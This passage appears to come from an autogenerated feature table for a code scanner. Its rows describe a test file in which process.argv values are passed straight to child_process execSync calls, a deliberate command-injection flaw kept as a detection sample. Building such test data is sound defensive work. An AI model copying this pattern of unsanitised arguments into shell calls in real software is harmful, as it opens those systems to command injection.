autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:24:15:24 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:24:15:24 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:24:15:24 | 0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:24:15:24 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:24:15:24 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:12 | cp.execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:12 | cp.execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | cp.exec ... rgs[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | cp.exec ... rgs[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | cp.exec ... rgs[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | cp.exec ... rgs[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | cp.exec ... rgs[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | exceptional return of cp.exec ... rgs[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | exceptional return of cp.exec ... rgs[0]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | exceptional return of cp.exec ... rgs[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | exceptional return of cp.exec ... rgs[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | exceptional return of cp.exec ... rgs[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:5:16:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:5:16:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:5:16:12 | execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:5:16:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:5:16:12 | execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:22 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:22 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:22 | "cmd.sh " | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:22 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:22 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:22 | "cmd.sh " | stringConcatenatedWith | -endpoint- fewerArgs.0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:34 | fewerArgs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:34 | fewerArgs | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:34 | fewerArgs | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:34 | fewerArgs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:34 | fewerArgs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:37 | fewerArgs[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:37 | fewerArgs[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:37 | fewerArgs[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:37 | fewerArgs[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:37 | fewerArgs[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:26:16:37 | fewerArgs[0] | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:36:16:36 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:36:16:36 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:36:16:36 | 0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:36:16:36 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:36:16:36 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:9 | arg0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:9 | arg0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:9 | arg0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:9 | arg0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:9 | arg0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 = fewerArgs[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 = fewerArgs[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 = fewerArgs[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 = fewerArgs[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:6:18:24 | arg0 = fewerArgs[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:21 | fewerArgs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:21 | fewerArgs | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:21 | fewerArgs | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:21 | fewerArgs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:21 | fewerArgs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:24 | fewerArgs[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:24 | fewerArgs[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:24 | fewerArgs[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:24 | fewerArgs[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:13:18:24 | fewerArgs[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:23:18:23 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:23:18:23 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:23:18:23 | 0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:23:18:23 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:18:23:18:23 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:12 | cp.execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:12 | cp.execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | cp.execSync(arg0) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | cp.execSync(arg0) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | cp.execSync(arg0) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | cp.execSync(arg0) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | cp.execSync(arg0) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | exceptional return of cp.execSync(arg0) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | exceptional return of cp.execSync(arg0) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | exceptional return of cp.execSync(arg0) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | exceptional return of cp.execSync(arg0) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | 